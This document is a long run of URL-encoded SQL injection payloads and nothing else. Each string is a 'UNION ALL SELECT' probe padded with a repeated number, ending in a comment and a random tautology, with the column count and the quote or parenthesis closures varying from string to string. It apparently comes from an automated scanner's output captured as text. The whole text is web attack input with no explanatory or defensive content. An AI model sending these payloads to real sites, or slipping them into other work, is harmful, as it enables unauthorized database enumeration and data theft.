-4331%27%29%20UNION%20ALL%20SELECT%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%2C%201052%23%20AND%20%28%27oaPU%27%20LIKE%20%27oaPU -9684%27%29%29%20UNION%20ALL%20SELECT%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%23%20AND%20%28%28%27LRhC%27%20LIKE%20%27LRhC -2429%27%29%29%20UNION%20ALL%20SELECT%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%23%20AND%20%28%28%27hOmh%27%20LIKE%20%27hOmh -6978%27%29%29%20UNION%20ALL%20SELECT%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%2C%209152%23%20AND%20%28%28%27IrdJ%27%20LIKE%20%27IrdJ -7296%27%29%29%20UNION%20ALL%20SELECT%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%2C%207107%23%20AND%20%28%28%27mbfm%27%20LIKE%20%27mbfm -1077%27%29%29%20UNION%20ALL%20SELECT%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%2C%203882%23%20AND%20%28%28%27Xajh%27%20LIKE%20%27Xajh -5587%27%29%29%20UNION%20ALL%20SELECT%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%23%20AND%20%28%28%27Ieqi%27%20LIKE%20%27Ieqi -5246%27%29%29%20UNION%20ALL%20SELECT%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%23%20AND%20%28%28%27SpqB%27%20LIKE%20%27SpqB -8835%27%29%29%20UNION%20ALL%20SELECT%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%2C%208012%23%20AND%20%28%28%27GrTA%27%20LIKE%20%27GrTA -1098%27%29%29%20UNION%20ALL%20SELECT%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%2C%203565%23%20AND%20%28%28%27kFgd%27%20LIKE%20%27kFgd -2149%27%29%29%20UNION%20ALL%20SELECT%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%2C%206896%23%20AND%20%28%28%27Ddrh%27%20LIKE%20%27Ddrh -5338%27%29%29%29%20UNION%20ALL%20SELECT%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%23%20AND%20%28%28%28%27aqmA%27%20LIKE%20%27aqmA -5832%27%29%29%29%20UNION%20ALL%20SELECT%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%2C%201687%23%20AND%20%28%28%28%27njel%27%20LIKE%20%27njel -4057%27%29%29%29%20UNION%20ALL%20SELECT%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%2C%206060%23%20AND%20%28%28%28%27aDrp%27%20LIKE%20%27aDrp -7271%27%29%29%29%20UNION%20ALL%20SELECT%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%2C%204832%23%20AND%20%28%28%28%27nPqs%27%20LIKE%20%27nPqs -2985%27%29%29%29%20UNION%20ALL%20SELECT%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%2C%204932%23%20AND%20%28%28%28%27nmTG%27%20LIKE%20%27nmTG -9394%27%29%29%29%20UNION%20ALL%20SELECT%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%2C%204115%23%20AND%20%28%28%28%27lxpG%27%20LIKE%20%27lxpG -6260%27%29%29%29%20UNION%20ALL%20SELECT%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%23%20AND%20%28%28%28%27bgOC%27%20LIKE%20%27bgOC -6202%27%29%29%29%20UNION%20ALL%20SELECT%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%2C%203866%23%20AND%20%28%28%28%27GNHA%27%20LIKE%20%27GNHA -6218%27%29%29%29%20UNION%20ALL%20SELECT%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%2C%207010%23%20AND%20%28%28%28%27drvm%27%20LIKE%20%27drvm -5539%27%29%29%29%20UNION%20ALL%20SELECT%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%2C%202043%23%20AND%20%28%28%28%27BLcD%27%20LIKE%20%27BLcD -4729%27%20UNION%20ALL%20SELECT%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%2C%203598%23%20AND%20%27eCaL%27%20LIKE%20%27eCaL -1445%27%20UNION%20ALL%20SELECT%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%2C%203373%23%20AND%20%27dtfv%27%20LIKE%20%27dtfv -8601%27%20UNION%20ALL%20SELECT%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%2C%206155%23%20AND%20%27Trll%27%20LIKE%20%27Trll -1934%27%20UNION%20ALL%20SELECT%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%2C%202490%23%20AND%20%27xawk%27%20LIKE%20%27xawk -7031%27%20UNION%20ALL%20SELECT%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%2C%208032%23%20AND%20%27SJjo%27%20LIKE%20%27SJjo -9674%27%20UNION%20ALL%20SELECT%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%23%20AND%20%27PuNY%27%20LIKE%20%27PuNY -6339%27%20UNION%20ALL%20SELECT%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%23%20AND%20%27IcRy%27%20LIKE%20%27IcRy -8380%27%20UNION%20ALL%20SELECT%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%2C%204141%23%20AND%20%27QWkl%27%20LIKE%20%27QWkl -7015%27%20UNION%20ALL%20SELECT%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%2C%202222%23%20AND%20%27ywoF%27%20LIKE%20%27ywoF -3685%27%20UNION%20ALL%20SELECT%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%2C%203560%23%20AND%20%27hEpa%27%20LIKE%20%27hEpa -4551%22%29%20UNION%20ALL%20SELECT%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%2C%203836%23%20AND%20%28%22qYtu%22%3D%22qYtu -9876%22%29%20UNION%20ALL%20SELECT%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%2C%203793%23%20AND%20%28%22kUwW%22%3D%22kUwW -6224%22%29%20UNION%20ALL%20SELECT%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%23%20AND%20%28%22qxzu%22%3D%22qxzu -4894%22%29%20UNION%20ALL%20SELECT%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%23%20AND%20%28%22KwlJ%22%3D%22KwlJ -5228%22%29%20UNION%20ALL%20SELECT%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%2C%205612%23%20AND%20%28%22EtOK%22%3D%22EtOK -6590%22%29%20UNION%20ALL%20SELECT%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%2C%203290%23%20AND%20%28%22tIwA%22%3D%22tIwA -2878%22%29%20UNION%20ALL%20SELECT%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%2C%208083%23%20AND%20%28%22Rvgy%22%3D%22Rvgy -9453%22%29%20UNION%20ALL%20SELECT%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%2C%202927%23%20AND%20%28%22DDlD%22%3D%22DDlD -2751%22%29%20UNION%20ALL%20SELECT%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%2C%204120%23%20AND%20%28%22fWal%22%3D%22fWal -4657%22%29%20UNION%20ALL%20SELECT%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%2C%204536%23%20AND%20%28%22fmFn%22%3D%22fmFn -1779%22%29%29%20UNION%20ALL%20SELECT%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%2C%204838%23%20AND%20%28%28%22zNrS%22%3D%22zNrS -5743%22%29%29%20UNION%20ALL%20SELECT%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736%23%20AND%20%28%28%22rQbR%22%3D%22rQbR -5322%22%29%29%20UNION%20ALL%20SELECT%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%2C%208869%23%20AND%20%28%28%22dVDy%22%3D%22dVDy -8633%22%29%29%20UNION%20ALL%20SELECT%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%2C%204155%23%20AND%20%28%28%22MkzO%22%3D%22MkzO -9770%22%29%29%20UNION%20ALL%20SELECT%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%23%20AND%20%28%28%22zpkS%22%3D%22zpkS -4856%22%29%29%20UNION%20ALL%20SELECT%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%2C%201527%23%20AND%20%28%28%22fFkH%22%3D%22fFkH -6978%22%29%29%20UNION%20ALL%20SELECT%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%23%20AND%20%28%28%22hcno%22%3D%22hcno -9126%22%29%29%20UNION%20ALL%20SELECT%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%23%20AND%20%28%28%22rKvz%22%3D%22rKvz -8424%22%29%29%20UNION%20ALL%20SELECT%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%2C%201645%23%20AND%20%28%28%22XZMA%22%3D%22XZMA -2261%22%29%29%20UNION%20ALL%20SELECT%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%23%20AND%20%28%28%22vPwQ%22%3D%22vPwQ -7294%22%29%29%29%20UNION%20ALL%20SELECT%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%2C%209133%23%20AND%20%28%28%28%22Viah%22%3D%22Viah -1990%22%29%29%29%20UNION%20ALL%20SELECT%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%23%20AND%20%28%28%28%22WXvW%22%3D%22WXvW -4574%22%29%29%29%20UNION%20ALL%20SELECT%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%23%20AND%20%28%28%28%22MmBt%22%3D%22MmBt -7947%22%29%29%29%20UNION%20ALL%20SELECT%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%23%20AND%20%28%28%28%22WTpu%22%3D%22WTpu -7888%22%29%29%29%20UNION%20ALL%20SELECT%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%2C%201154%23%20AND%20%28%28%28%22xnkM%22%3D%22xnkM 